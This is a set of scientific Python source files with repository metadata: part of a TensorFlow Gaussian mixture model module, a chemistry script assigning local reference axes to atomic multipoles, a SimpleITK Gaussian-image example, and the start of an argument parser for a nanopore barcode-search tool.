inv_cov = array_ops.tile(
array_ops.expand_dims(inverse, 0),
array_ops.stack([self._num_examples, 1, 1]))
diff = array_ops.transpose(shard - self._means[c, :, :], perm=[1, 0, 2])
m_left = math_ops.matmul(diff, inv_cov)
all_scores.append(
math_ops.sqrt(
math_ops.matmul(
m_left, array_ops.transpose(
diff, perm=[0, 2, 1]))))
self._all_scores.append(
array_ops.reshape(
array_ops.concat(all_scores, 1),
array_ops.stack([self._num_examples, self._num_classes])))
# Distance to the associated class.
self._all_scores = array_ops.concat(self._all_scores, 0)
assignments = array_ops.concat(self.assignments(), 0)
rows = math_ops.to_int64(math_ops.range(0, self._num_examples))
indices = array_ops.concat(
[array_ops.expand_dims(rows, 1), array_ops.expand_dims(assignments, 1)],
1)
self._scores = array_ops.gather_nd(self._all_scores, indices)
def _define_loglikelihood_operation(self):
"""Defines the total log-likelihood of current iteration."""
self._ll_op = []
for prior_probs in self._prior_probs:
self._ll_op.append(math_ops.reduce_sum(math_ops.log(prior_probs)))
summary.scalar('ll', math_ops.reduce_sum(self._ll_op))
def gmm(inp,
initial_clusters,
num_clusters,
random_seed,
covariance_type=FULL_COVARIANCE,
params='wmc'):
"""Creates the graph for Gaussian mixture model (GMM) clustering.
Args:
inp: An input tensor or list of input tensors
initial_clusters: Specifies the clusters used during
initialization. Can be a tensor or numpy array, or a function
that generates the clusters. Can also be "random" to specify
that clusters should be chosen randomly from input data. Note: type
is diverse to be consistent with skflow.
num_clusters: number of clusters.
random_seed: Python integer. Seed for PRNG used to initialize centers.
covariance_type: one of "diag", "full".
params: Controls which parameters are updated in the training
process. Can contain any combination of "w" for weights, "m" for
means, and "c" for covars.
Returns:
Note: tuple of lists returned to be consistent with skflow
A tuple consisting of:
all_scores: A matrix (or list of matrices) of dimensions (num_input,
num_clusters) where the value is the distance of an input vector and a
cluster center.
assignments: A vector (or list of vectors). Each element in the vector
corresponds to an input row in 'inp' and specifies the cluster id
corresponding to the input.
scores: Similar to assignments but specifies the distance to the
assigned cluster instead.
training_op: an op that runs an iteration of training.
init_op: an op that runs the initialization.
"""
initial_means = None
if initial_clusters != 'random' and not isinstance(initial_clusters,
ops.Tensor):
initial_means = constant_op.constant(initial_clusters, dtype=dtypes.float32)
# Implementation of GMM.
inp = inp if isinstance(inp, list) else [inp]
gmm_tool = GmmAlgorithm(inp, num_clusters, initial_means, params,
covariance_type, random_seed)
assignments = gmm_tool.assignments()
all_scores, scores = gmm_tool.scores()
return ([all_scores], [assignments], [scores], gmm_tool.training_ops(),
gmm_tool.init_ops(), gmm_tool.is_initialized())
|
xuleiboy1234/autoTitle
|
tensorflow/tensorflow/contrib/factorization/python/ops/gmm_ops.py
|
Python
|
mit
| 22,026
|
[
"Gaussian"
] |
738cd22d3a37ae3bd1997cb52dc0797e94892f548de962a785dd2bfcd7e0db14
|
#!/usr/bin/env python
#
# Copyright 2013 Tristan Bereau and Christian Kramer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
####################
#
# This program generates a .pun file with the local reference axis system assigned for each atom
def distribute_charge(atom,chrg):
"""Identifies groups of atoms connected by pi systems
and distributes charge assignment among these."""
global checked
global hbrdz
global dchrg
neighbors = atom.GetNeighbors()
for at in neighbors:
if checked[at.GetIdx()] == False and (hbrdz[at.GetIdx()] in ['SP2','SP']):
checked[at.GetIdx()] = True
dchrg[at.GetIdx()] += chrg
distribute_charge(at,chrg)
import sys
###########
# Set defaults
basename = ''
pun = True
boxp = False
bondcheck = True
punxyz = False
###########
# Read Input
for i in range(len(sys.argv)):
if sys.argv[i] == '-in':
basename = sys.argv[i+1]
elif sys.argv[i] == '-lpun':
pun = False
elif sys.argv[i] == '-boxp':
boxp = True
elif sys.argv[i] == '-nobondcheck':
bondcheck = False
elif sys.argv[i] == '-punxyz':
punxyz = True
elif sys.argv[i] == '-h':
print "Usage: python calc_LRA.py -in [base filename] [-lpun] [-boxp] [-punxyz] [-nobondcheck] [-h]"
print "(Base filename might also end on {.sdf, .log, .pun, .out})"
exit(0)
if basename == '':
print "Could not recognize file basename."
print "Usage: python calc_LRA.py -in [base filename] [-lpun] [-boxp] [-punxyz] [-nobondcheck] [-h]"
print "(Base filename might also end on {.sdf, .log, .pun, .out})"
exit(0)
import copy, os, string
import rdkit
from rdkit import Chem
if basename[-4:] in ['.sdf','.log','.pun','.out']: basename = basename[:-4]
##############
# Get coordinates from the gaussian output file or the punfile
# The Gaussian output file is supposed to end on .log
# If no Gaussian output file that ends on .log is found, a gaussian output file
# that ends on .out is searched. If both are not found, the program is exited.
if punxyz == True:
import mtp_tools, numpy
mo = mtp_tools.molecule()
mo.readfromrawpunfile(basename+'.pun')
xyzblock = []
for atom in mo.atoms: xyzblock.append([atom.atype, float(atom.coords[0]), float(atom.coords[1]), float(atom.coords[2])])
else:
outfiles = []
outfile = ''
if os.path.exists(basename+'.log'):
outfiles.append(basename+'.log')
elif os.path.exists(basename+'.out'):
outfiles.append(basename+'.out')
for fi in outfiles:
f = open(fi,'r')
lines = f.readlines()
for line in lines:
if " Entering Gaussian System" in line:
outfile = fi
f.close()
if outfile == '':
print "Cannot find Gaussian output file", \
basename+".log or",basename+'.out.'
print "Program exiting"
exit(0)
f = open(outfile,'r')
gin = f.readlines()
f.close()
# This extracts the bonding block (unless the molecule is super super large)
gin = gin [-400:-6]
for i in range(len(gin)):
if 'l9999.exe' in gin[i]: break
if i == len(gin):
print "Have not been able to extract the bonding block from the Gaussian output file for ",basename
print "Exiting"
exit(0)
gin = gin[i+1:]
xyzblock = ''
for line in gin: xyzblock = xyzblock+line.strip()
xyzblock = xyzblock.split('\\')
for i in range(len(xyzblock)):
xyzblock[i] = xyzblock[i].replace(' ','')
for i in range(len(xyzblock)):
if xyzblock[i][0:7] == "Version": break
xyzblock = xyzblock[16:i-1]
for i in range(len(xyzblock)):
xyzblock[i] = xyzblock[i].split(',')
lenblock = len(xyzblock[i])
xyzblock[i][1] = float(xyzblock[i][lenblock-3])
xyzblock[i][2] = float(xyzblock[i][lenblock-2])
xyzblock[i][3] = float(xyzblock[i][lenblock-1])
##########
# Read .sd File & update H-bond information if necessary
f = open(basename+'.sdf','r')
orig_sdf = f.readlines()
f.close()
natoms = int(orig_sdf[3][0:3])
nbonds = int(orig_sdf[3][3:6])
bonds = orig_sdf[4+natoms:4+natoms+nbonds]
fchrg = [0]*natoms
if orig_sdf[4+natoms+nbonds][0:6] == 'M CHG':
chrg_line = orig_sdf[4+natoms+nbonds].split()
for i in range((len(orig_sdf[4+natoms+nbonds].split())-3)/2): fchrg[int(chrg_line[3+2*i])-1] = int(chrg_line[4+2*i])
if len(xyzblock) <> natoms:
print "Number of atoms in the original SD-File and the Gaussian output file are different for ",basename
print "LRA-assignment stopped."
print len(xyzblock),natoms
exit(1)
for i in range(len(xyzblock)):
if xyzblock[i][0] == 'H':
# find closest atom
dist = 100
closest_atom = i
for j in range(len(xyzblock)):
if j == i: continue
d = (xyzblock[i][1]-xyzblock[j][1])**2+(xyzblock[i][2]-xyzblock[j][2])**2+(xyzblock[i][3]-xyzblock[j][3])**2
if d < dist:
dist = d
closest_atom = j+1
# check whether closest atom is bond partner and replace information if necessary
for j in range(len(bonds)):
if int(bonds[j][0:3]) == i+1:
if int(bonds[j][3:6]) == closest_atom:
break
else:
previous_partner = int(bonds[j][3:6])
print 'SD-update in',basename,': Bond between ',i+1,'and',previous_partner,'replaced by bond between',i+1,'and',closest_atom
a = bonds[j][0:5]+str(closest_atom)+bonds[j][6:]
if closest_atom > 9: a = bonds[j][0:4]+str(closest_atom)+bonds[j][6:]
if closest_atom > 99: a = bonds[j][0:3]+str(closest_atom)+bonds[j][6:]
bonds[j] = a
fchrg[previous_partner-1] -= 1
fchrg[closest_atom-1] += 1
break
if int(bonds[j][3:6]) == i+1:
if int(bonds[j][0:3]) == closest_atom:
break
else:
previous_partner = int(bonds[j][0:3])
print 'SD-update: Bond between ',i+1,'and',previous_partner,'replaced by bond between',i+1,'and',closest_atom
a = ' '+str(closest_atom)+bonds[j][3:]
if closest_atom > 9: a = ' '+str(closest_atom)+bonds[j][3:]
if closest_atom > 99: a = str(closest_atom)+bonds[j][3:]
bonds[j] = a
fchrg[previous_partner-1] -= 1
fchrg[closest_atom-1] += 1
break
## Write updated SD-File to output
# f = open(basename+'_n.sdf','w')
# for i in range(4): f.write(orig_sdf[i])
#
# for i in range(natoms):
# astring = '%10.4f'%xyzblock[i][1]
# astring = astring + '%10.4f'%xyzblock[i][2]
# astring = astring + '%10.4f'%xyzblock[i][3]
# astring = astring + orig_sdf[4+i][30:33]
# f.write(astring)
#
# for i in range(nbonds): f.write(bonds[i])
#
# if natoms-charge.count(0) > 0:
# chargeline = 'M CHG '+str(natoms-charge.count(0))
# for i in range(len(charge)):
# if charge[i] <> 0: chargeline = chargeline+' '+str(i)+' '+str(charge[i])
# chargeline = chargeline+'\n'
# f.write(chargeline)
#
# for i in range(len(orig_sdf)-5-natoms-nbonds): f.write(orig_sdf[5+natoms+nbonds+i])
#
# f.close()
###########
# Read .sd File using RDkit
try:
mol = Chem.MolFromMolFile(basename+'.sdf',removeHs=False)
except:
print 'Cannot read SD File ',basename,'.sdf properly. Program exiting.'
exit(0)
if natoms < 2:
print "Problem with ",basename
print "Currently only molecules with 2 or more atoms can be handled. Exiting"
exit(0)
###########
# Atom type each atom
atypes = [''] * natoms
atoms = mol.GetAtoms()
hbrdz = []
for atom in atoms: hbrdz.append(str(atom.GetHybridization()).split('.')[-1])
##########
# Get neighbours and second neighbours, assign terminal atoms
neighbour_atoms = [[]]*natoms
for bond in bonds:
bpartners = [bond[0:3],bond[3:6]]
neighbour_atoms[int(bpartners[0])-1] = neighbour_atoms[int(bpartners[0])-1]+[int(bpartners[1])-1]
neighbour_atoms[int(bpartners[1])-1] = neighbour_atoms[int(bpartners[1])-1]+[int(bpartners[0])-1]
terminal = [False]*natoms
for i in range(natoms):
if len(neighbour_atoms[i]) == 1:
terminal[i] = True
# Terminal atoms on SP hybridized atoms are not assigned SP hybridization in RDkit. So this has to be added here
if hbrdz[neighbour_atoms[i][0]] == 'SP': hbrdz[i] = 'SP'
nextneighbours = [[]]*natoms
for i,j in enumerate(terminal):
if j == True:
nextneighbours[i] = copy.copy(neighbour_atoms[neighbour_atoms[i][0]])
nextneighbours[i].remove(i)
##########
# Atom type Amides and aromatics (the others as well, but this is removed later on)
smartsf = open(__file__[:__file__.rfind("/")] + '/essential_atom_types.txt','r')
etypes = []
lines = smartsf.readlines()
for line in lines:
if line[0] == '#': continue
line = line.split()
if len(line) < 2: continue
etypes.append(dict(type=line[0],smarts=line[1],molsmarts=Chem.MolFromSmarts(line[1])))
smartsf.close()
atypes = [''] * natoms
priorities = [0] * natoms
for i,tp in enumerate(etypes):
for at in mol.GetSubstructMatches(tp["molsmarts"],uniquify=False):
if atypes[at[0]] == '':
atypes[at[0]] = tp["type"]
priorities[at[0]] = i
############
# Finish Atom typing and assignment of priorities
for i in range(natoms):
if atypes[i][0] in ['C','N','O','P','S'] and atypes[i][1:] not in ['ar','am','l']: atypes[i] = atypes[i][0]+str(len(neighbour_atoms[i]))
for i,tp in enumerate(etypes):
for j in range(natoms):
if atypes[j] == tp["type"]: priorities[j] = i
############
# Add charges and distribute them across conjugated systems.
# This is done based on the old SD File (before Gaussian), naively
# assuming that Conjugation does not change during optimization.
#
# 1: Calculate formal charge on each atom
# 2: Calculate hybridization type on each atom (Hs will be unspecified)
# 3: Distribute charge to all conjugated atoms (i.e. atoms which are
# connected through a network of non-sp3 hybridization)
dchrg = copy.copy(fchrg)
for i,atom in enumerate(atoms):
checked = [False] * natoms
checked[i] = True
if fchrg[i] <> 0 and (hbrdz[i] in ['SP2','SP']):
distribute_charge(atom,fchrg[i])
for i in range(len(dchrg)):
if dchrg[i] > 0:
atypes[i] = atypes[i] + dchrg[i]*'+'
elif dchrg[i] < 0:
atypes[i] = atypes[i] + (-1)*dchrg[i]*'-'
# Initialize lin assignment (in case SP search below fails.)
# If we have a diatomic molecule, use the lin atom tyep
lin = [False]*natoms
if natoms == 2:
lin = [True]*natoms
# Special treatment for SP-hybridised Atoms: go along the chain until the end is reached (terminal = True)
# or Non SP-hybridised atoms are found
#
# SP atoms are assigned terminal reference spheres by default
SP_name_atoms = ['']*natoms
SP_neighbour_atoms = ['']*natoms
SP_nextneighbours = ['']*natoms
for i in range(natoms):
if hbrdz[i] <> 'SP': continue
if lin[i]: continue
if terminal[i] == True:
a = copy.copy(neighbour_atoms[i][0])
SP_name_atoms[i] = [a,nextneighbours[i][0]]
SP_neighbour_atoms[i] = copy.copy([a])
excl_list = [i,a]
while True:
b = copy.copy(neighbour_atoms[a])
for j in b:
if j in excl_list: b.remove(j)
if b == []:
lin[i] = True
break
if hbrdz[b[0]] == 'SP':
excl_list.append(b[0])
a = b[0]
continue
else:
break
if lin[i]: continue
SP_nextneighbours[i] = copy.copy(neighbour_atoms[b[0]])
for j in SP_nextneighbours[i]:
if j in excl_list: SP_nextneighbours[i].remove(j)
else:
a1 = copy.copy(neighbour_atoms[i][0])
a2 = copy.copy(neighbour_atoms[i][1])
if priorities[a1] < priorities[a2]:
SP_name_atoms[i] = [a1,a2]
else:
SP_name_atoms[i] = [a2,a1]
def_found = False
excl_list = [i,a1,a2]
a = a1
while True:
if terminal[a] == True:
break
elif hbrdz[a] <> 'SP':
def_found = True
SP_neighbour_atoms[i] = copy.copy([a])
SP_nextneighbours[i] = copy.copy(neighbour_atoms[a])
for j in SP_nextneighbours[i]:
if j in excl_list: SP_nextneighbours[i].remove(j)
break
else:
a = copy.copy(neighbour_atoms[a])
for j in a:
if j in excl_list: a.remove(j)
if a == []:
lin[i] = True
break
else:
a = a[0]
excl_list.append(a)
a = a2
while True:
if def_found == True: break
if terminal[a] == True:
# Tag atom as lin
lin[i] = True
break
elif hbrdz[a] <> 'SP':
def_found = True
SP_neighbour_atoms[i] = copy.copy([a])
SP_nextneighbours[i] = copy.copy(neighbour_atoms[a])
for j in SP_nextneighbours[i]:
if j in excl_list: SP_nextneighbours[i].remove(j)
break
else:
a = copy.copy(neighbour_atoms[a])
for j in a:
if j in excl_list: a.remove(j)
if a == []:
lin[i] = True
break
else:
a = a[0]
excl_list.append(a)
for i in range(natoms):
if hbrdz[i] == 'SP' and not lin[i]:
terminal[i] = True
neighbour_atoms[i] = SP_neighbour_atoms[i]
nextneighbours[i] = SP_nextneighbours[i]
###########
# Adjust priorities for charge: Priorities: negative charge > 0 > positive charge
if max(dchrg) > 10 or min(dchrg) < (-10):
print "Absolute distributed charges have become very large."
print " Please check your molecule"
exit(0)
for i in range(len(dchrg)):
priorities[i] = priorities[i] + dchrg[i] * 0.01
###########
# Initialize c3v assignment
c3v = [False]*natoms
###########
# Sort nearest neighbors according to priority and assign reference atoms by idx for each atom
priorised_neighbours = ['']*natoms
for i in range(natoms):
if terminal[i] == False:
neighbour_priorities = []
for neighbour in neighbour_atoms[i]: neighbour_priorities.append(priorities[neighbour])
prio_count = []
for j in neighbour_priorities: prio_count.append(neighbour_priorities.count(j))
# 'lin' type. Non-terminal can be defined by two atoms.
if lin[i]:
pri_neigh = []
for j in range(min(2,len(neighbour_atoms[i]))):
pri_neigh.append(neighbour_atoms[i][j])
priorised_neighbours[i] = pri_neigh
# Three neighbour atoms of the same kind
elif max(prio_count) == 3:
c3v[i] = True
pri_neigh = []
for j,count in enumerate(prio_count):
if count == 3: pri_neigh.append(neighbour_atoms[i][j])
for j,count in enumerate(prio_count):
if count == 1: pri_neigh.append(neighbour_atoms[i][j])
priorised_neighbours[i] = pri_neigh
# Two * two neighbour atoms of the same kind
elif max(prio_count) == 2 and min(prio_count) == 2 and len(prio_count) == 4:
pri_neigh = []
a = min(neighbour_priorities)
for j,prio in enumerate(neighbour_priorities):
if prio == a: pri_neigh.append(neighbour_atoms[i][j])
for j,prio in enumerate(neighbour_priorities):
if prio <> a: pri_neigh.append(neighbour_atoms[i][j])
priorised_neighbours[i] = pri_neigh
# Two neighbour atoms overall, both of the same kind
elif max(prio_count) == 2 and len(prio_count) == 2:
priorised_neighbours[i] = [neighbour_atoms[i][0],neighbour_atoms[i][1]]
# Three or four neighbour atoms with two of them of the same kind
elif max(prio_count) == 2 and min(prio_count) < 2:
pri_neigh = []
for j,count in enumerate(prio_count):
if count == 2: pri_neigh.append(neighbour_atoms[i][j])
neighbour_priorities = [neighbour_priorities[j] for j,k in enumerate(prio_count) if k < 2]
rest_atoms = [neighbour_atoms[i][j] for j,k in enumerate(prio_count) if k < 2]
pri_neigh.append(rest_atoms[neighbour_priorities.index(min(neighbour_priorities))])
if len(neighbour_atoms[i]) == 4: pri_neigh.append(rest_atoms[neighbour_priorities.index(max(neighbour_priorities))])
priorised_neighbours[i] = pri_neigh
# All neighbour atoms different
else:
pri_neigh = []
next_atoms = list(neighbour_atoms[i])
while len(neighbour_priorities) > 0:
pri_neigh.append(next_atoms[neighbour_priorities.index(min(neighbour_priorities))])
del next_atoms[neighbour_priorities.index(min(neighbour_priorities))]
del neighbour_priorities[neighbour_priorities.index(min(neighbour_priorities))]
priorised_neighbours[i] = pri_neigh
for i,atom in enumerate(atoms):
if terminal[i] == True:
# The single nearest neighbour has the highest priority
pri_neigh = [neighbour_atoms[i][0]]
neighbour_priorities = []
for neighbour in nextneighbours[i]: neighbour_priorities.append(priorities[neighbour])
prio_count = []
for j in neighbour_priorities: prio_count.append(neighbour_priorities.count(j))
# 'lin' type. Terminal only defined by one neighbor.
if lin[i]:
priorised_neighbours[i] = pri_neigh
# Three second neighbour atoms of the same kind
elif max(prio_count) == 3:
pri_neigh.append(nextneighbours[i][0])
pri_neigh.append(nextneighbours[i][1])
pri_neigh.append(nextneighbours[i][2])
priorised_neighbours[i] = pri_neigh
# Two second neighbour atoms of the same kind and no other second neighbour atom
elif max(prio_count) == 2 and len(prio_count) == 2:
pri_neigh.append(nextneighbours[i][0])
pri_neigh.append(nextneighbours[i][1])
priorised_neighbours[i] = pri_neigh
# Two second neighbour atoms of the same kind and one more atom in the second sphere
elif max(prio_count) == 2 and len(prio_count) == 3:
for j,count in enumerate(prio_count):
if count == 2: pri_neigh.append(nextneighbours[i][j])
pri_neigh.append(nextneighbours[i][prio_count.index(1)])
priorised_neighbours[i] = pri_neigh
# All second neighbours of different kinds
else:
next_atoms = list(nextneighbours[i])
while len(neighbour_priorities) > 0:
pri_neigh.append(next_atoms[neighbour_priorities.index(min(neighbour_priorities))])
del next_atoms[neighbour_priorities.index(min(neighbour_priorities))]
del neighbour_priorities[neighbour_priorities.index(min(neighbour_priorities))]
priorised_neighbours[i] = pri_neigh
############
# Assemble Composite atomtype Names
com_atypes = []
for i in range(len(atypes)):
com_atype = atypes[i]
if hbrdz[i] <> 'SP':
for j in priorised_neighbours[i]:com_atype = com_atype + atypes[j]
else:
com_atype = com_atype + atypes[SP_name_atoms[i][0]] + atypes[SP_name_atoms[i][1]]
com_atypes.append(com_atype)
###########
# Write output file
if pun == True:
f = open(basename+'.pun','r')
ol_punf = f.readlines()
f.close()
f = open(basename+'_l.pun','w')
k=0
header = True
while k <= len(ol_punf) and header:
line = ol_punf[k].split()
if len(line) >= 6 and line[4] == "Rank" \
and line[0] not in ['#','!']:
header = False
k += 1
for i in range(k-1): f.write(ol_punf[i])
for i in range(len(atoms)):
line = ol_punf[k-1][2:]
line = com_atypes[i]+line
f.write(line)
line = line.split()
rnk = line[-1]
if rnk == '0':
for j in range(1): f.write(ol_punf[k+j])
k = k + 3
elif rnk == '2':
for j in range(3): f.write(ol_punf[k+j])
k = k + 5
else:
print "Error. Rank not supported ("+rnk+"). Exiting"
print line
exit(1)
f.write('\n')
f.write('LRA:\n')
for i in range(len(atoms)):
if lin[i]:
f.write('lin')
elif terminal[i] == True:
f.write('ter')
elif c3v[i] == True:
f.write('c3v')
else:
f.write('int')
for j in priorised_neighbours[i]: f.write(' '+str(j+1))
f.write('\n')
f.write('\n')
f.close()
if pun == False:
import mtp_tools, math, numpy
mo = mtp_tools.molecule()
mo.readfromrawpunfile(basename+'.pun')
for i in range(natoms):
mo.atoms[i].refkind = 'int'
if terminal[i] == True: mo.atoms[i].refkind = 'ter'
if c3v[i] == True: mo.atoms[i].refkind = 'c3v'
for j in range(len(priorised_neighbours[i])): mo.atoms[i].refatms.append(priorised_neighbours[i][j]+1)
mo.Calc_locMTP()
# Check bondlengths
if bondcheck == True:
for i in range(len(mo.atoms)):
if mo.atoms[i].refkind <> 'ter':
for j in range(len(mo.atoms[i].refatms)):
vect = mo.atoms[i].coords - mo.atoms[mo.atoms[i].refatms[j]-1].coords
dist = numpy.dot(vect,vect)
# 5.3 corresponds to 2.3 Angstroems (C-I bonds often have 2.1 Angstroems, it is annoying to see these in the warnings)
if dist > 5.3:
print 'Bondlength warning for molecule:',basename
print 'Distance between atom',str(i+1),'(',atypes[i],') and its reference atom',str(mo.atoms[i].refatms[j]),'(',atypes[mo.atoms[i].refatms[j]-1],') is',str(math.sqrt(dist)),'Angstroem'
print
f = open(basename+'.lpun','w')
f.write("! "+basename+"; Distributed multipoles rotated to local reference axis system.\n")
f.write("! Multipoles were obtained from "+basename+".pun. File was written by calc_lra.py.\n")
g = open(basename+'.pun','r')
for i in range(2): wrd = g.readline()
g.close()
f.write(wrd+'\n')
for i in range(len(atoms)):
f.write(com_atypes[i]+' '+str(i+1))
for j in range(3): f.write(' '+str(mo.atoms[i].coords[j]))
if boxp == False:
f.write(' Rank '+str(mo.atoms[i].rank)+'\n')
elif len(neighbour_atoms[i]) == 3 and terminal[i] == False:
# Calculate the box product as a scaling factor for the dipoles on internal pyramidal nitrogens
AC = mo.atoms[i].coords
RC0 = mo.atoms[mo.atoms[i].refatms[0]-1].coords
RC1 = mo.atoms[mo.atoms[i].refatms[1]-1].coords
RC2 = mo.atoms[mo.atoms[i].refatms[2]-1].coords
R0 = (RC0-AC)/math.sqrt(numpy.dot((RC0-AC),(RC0-AC).conj()))
R1 = (RC1-AC)/math.sqrt(numpy.dot((RC1-AC),(RC1-AC).conj()))
R2 = (RC2-AC)/math.sqrt(numpy.dot((RC2-AC),(RC2-AC).conj()))
boxp = numpy.dot(R0,numpy.cross(R1,R2))
f.write(' Rank '+str(mo.atoms[i].rank)+' '+str(boxp)+'\n')
else:
f.write(' Rank '+str(mo.atoms[i].rank)+'\n')
f.write('LRA: '+mo.atoms[i].refkind)
for j in mo.atoms[i].refatms: f.write(' '+str(j))
f.write('\n')
f.write(str(float(mo.atoms[i].chrg))+'\n')
for j in mo.atoms[i].dloc: f.write(str(j)+' ')
f.write('\n')
for j in mo.atoms[i].Qloc: f.write(str(j)+' ')
f.write('\n\n')
f.close()
|
MMunibas/FittingWizard
|
scripts/calc_LRA.py
|
Python
|
bsd-3-clause
| 23,340
|
[
"Gaussian",
"RDKit"
] |
02a0582d4d35aa233b358da7b367fd22d54c21c43cfa8d3b30b12ad8ee783061
|
#!/usr/bin/env python
# =========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# =========================================================================
from __future__ import print_function
import os
import SimpleITK as sitk
xImg = sitk.Image(256, 256, sitk.sitkFloat32)
yImg = sitk.Image(256, 256, sitk.sitkFloat32)
for y in range(0, xImg.GetSize()[1]):
for x in range(0, xImg.GetSize()[0]):
xImg.SetPixel(x, y, x)
yImg[x, y] = y
sigma = 50
xImg = sitk.Subtract(xImg, xImg.GetSize()[0] / 2)
yImg = yImg - yImg.GetSize()[1] / 2
gaussianImg = sitk.Exp(-1 * (xImg ** 2 + yImg ** 2) / (2.0 * sigma ** 2))
if ("SITK_NOSHOW" not in os.environ):
sitk.Show(gaussianImg, "Gaussian Blob")
|
blowekamp/SimpleITK
|
Examples/Python/ImageCreateAndSet.py
|
Python
|
apache-2.0
| 1,323
|
[
"Gaussian"
] |
7102a13b3cb064b7ff7fed93d04b9f083c7a131d20c56ad0fa168315661300c7
|
#!/usr/bin/env python2.7
import h5py, os, sys, argparse
import cStringIO as StringIO
from Bio import SeqIO
from fast5tools.f5class import *
from fast5tools.barcodeclass import *
from fast5tools.f5ops import *
from fast5tools.barcodeops import *
from fast5tools.helperops import *
from glob import glob
#################################################
## Argument Parser
#################################################
parser = argparse.ArgumentParser(description = """
Given path(s) to fast5 file(s) and/or directories of fast5s,
return info on barcodes.
Running time proportional to barcode lengths and specified search lengths along reads.
That needs to be balanced with the fact that longer barcodes will perform better.
John Urban (2015, 2016, 2017)
Originally planned with Mark Howison, Dave Berebaum, Chip Lawrence, and Taehee Lee
Originally implemented by Mark and Dave in separate scripts.
Re-implemented and expanded upon as part of Fast5 tools by John.
""", formatter_class = argparse.RawTextHelpFormatter)
parser.add_argument('fast5', metavar='fast5', nargs='+',
type= str,
help='''Paths to as many fast5 files and/or directories filled with fast5 files as you want.
Assumes all fast5 files have '.fast5' extension.
If inside dir of dirs with .fast5 files, then can just do "*" to get all files from all dirs.''')
parser.add_argument('-r', '--readtype', default="template",
type= str,
help='''Choose type of fasta to get.
Choices: 'template', 'complement', '2d'.
Default: template.''')
parser_barcode = parser.add_mutually_exclusive_group(required=True)
parser_barcode.add_argument('-b', '--barcodetable', type=str, default=False,
help='''Path to file with barcode names and sequences.
This can be any tab-separated table file.
Name and sequence are expected to be in column 3 and 5 by default.
Change columns using barcolumns option.
Lines starting with # (e.g. header) are ignored.''')
parser_barcode.add_argument('-B', '--barcodefasta', type=str, default=False,
help='''Path to fasta file with barcode names and sequences.''')
parser.add_argument('--barcolumns', type=str, default='3,5',
help='''If using a barcode table file, define which colums have the barcode name and sequence.
Provide comma-separated, 1-based pair of columns.
Default: 3,5''')
parser.add_argument('--barstart', type=int, default=0, help='''Start location within read sequence to begin searching for barcode.
Can also think about this option as how much of the read to clip off or ignore in the search.
Default: 0.
We have used 60 as well to ignore adapter sequences that remain.''')
parser.add_argument('--barlength', type=int, default=False, help='''Expected maximum length of barcodes.
By default, barlength is detected as longest barcode sequence.
Specifying this gives a hard/constant number to use.
It is best to ensure it is at least as long as the longest barcode.
This needs to be higher than barmin option, else barmin is returned.''')
parser.add_argument('--barflank', type=int, default=False, help='''Amount of extra sequence to add on to barlength.
By default, barlength is detected as longest barcode sequence.
By default, the amount of flank or extra sequence length to search is the given or detected barlength (i.e. search len = 2*barlen).
Specifying this gives a hard/constant number to use.''')
parser.add_argument('--barmin', type=int, default=100, help='''Absolute minimum length to use for barcode search. Default: 100''')
parser.add_argument('--match', type=int, default=4, help='''Match parameter. Should be >= 0. Default: 4.
After lots of messing around, using 4/-2/-1/-1 seemed to work well.
Original settings were 1,-1,-1,-1 somewhat modeled after BWA ont2d type.
However, in Jain et al paper indels cause ~10 pct error and subs cause ~5 pct - meaning when trying to align it here gaps should be penalized less than mismatches.
Also, increasing the match reward encouraged the alignments to cover larger parts of barcodes, allowing better discrimination.
The --full_query option of python swalign attempts to do this, but with some weird results - so I think this is better.''')
parser.add_argument('--mismatch', type=int, default=-2, help='''Mismatch penalty. Should be <= 0. Default: -2.''')
parser.add_argument('--gap_open', type=int, default=-1, help='''Gap open penalty. Should be <= 0.Default: -1.''')
parser.add_argument('--gap_ext', type=int, default=-1, help='''Gap extension penalty. Should be <= 0.Default: -1.''')
parser.add_argument('--gap_decay', type=int, default=0, help='''Gap extend decay parameter. Should be >= 0. Default: 0.''')
parser_alntype = parser.add_mutually_exclusive_group()
parser_alntype.add_argument('--global_aln', action='store_true', default=False, help='''Default is local smith-waterman alignment. Set this to use global alignment as implemented in swalign.
Experimental. Cannot use with --full_query.
This is not recommended, especially with large search spaces for barcodes -- as barcodes begin to look equally unlikely.''')
parser_alntype.add_argument('--full_query', action='store_true', default=False, help='''Default is local smith-waterman alignment. Set this to use full query alignment as implemented in swalign.
Experimental. Cannot use with --global_aln.
This is not recommended as it seems to give weird results.
Instead try setting the match/mismatch/gap parameters to encourage full barcode alignments - which I attempted to do aready.''')
parser.add_argument('--maxscore', action='store_true', default=False, help='''By default read name and max score probability returned. Add max score to output.''')
parser.add_argument('--meanscore', action='store_true', default=False, help='''By default read name and max score probability returned. Add mean score to output.''')
parser.add_argument('--allscores', action='store_true', default=False, help='''By default read name and max score probability returned. Add all scores to output.''')
parser.add_argument('--allprobs', action='store_true', default=False, help='''By default read name and max score probability returned. Add all probabilities to output.''')
parser.add_argument('--barcode_coords', action='store_true', default=False, help='''By default read name and max score probability returned. Add the start and end coordinates of barcode in alignment.''')
parser.add_argument('--read_coords', action='store_true', default=False, help='''By default read name and max score probability returned. Add the start and end coordinates of read in alignment.''')
parser.add_argument('--cigar', action='store_true', default=False, help='''By default read name and max score probability returned. Add cig string from swalign.''')
parser.add_argument('-s', '--sequence', action='store_true', default=False, help='''Add read sequence to output.''')
parser.add_argument('-q', '--quals', action='store_true', default=False, help='''Add qual string to output.''')
parser.add_argument('-C', '--compute_other_probs', action='store_true', default=False, help='''Typically only barcode with highest marginalized AS probabilities reported.
This will report highest probability barcode for a few different metrics.''')
## When two different barcodes are expected in a row at 5' end
parser_barcode2 = parser.add_mutually_exclusive_group()
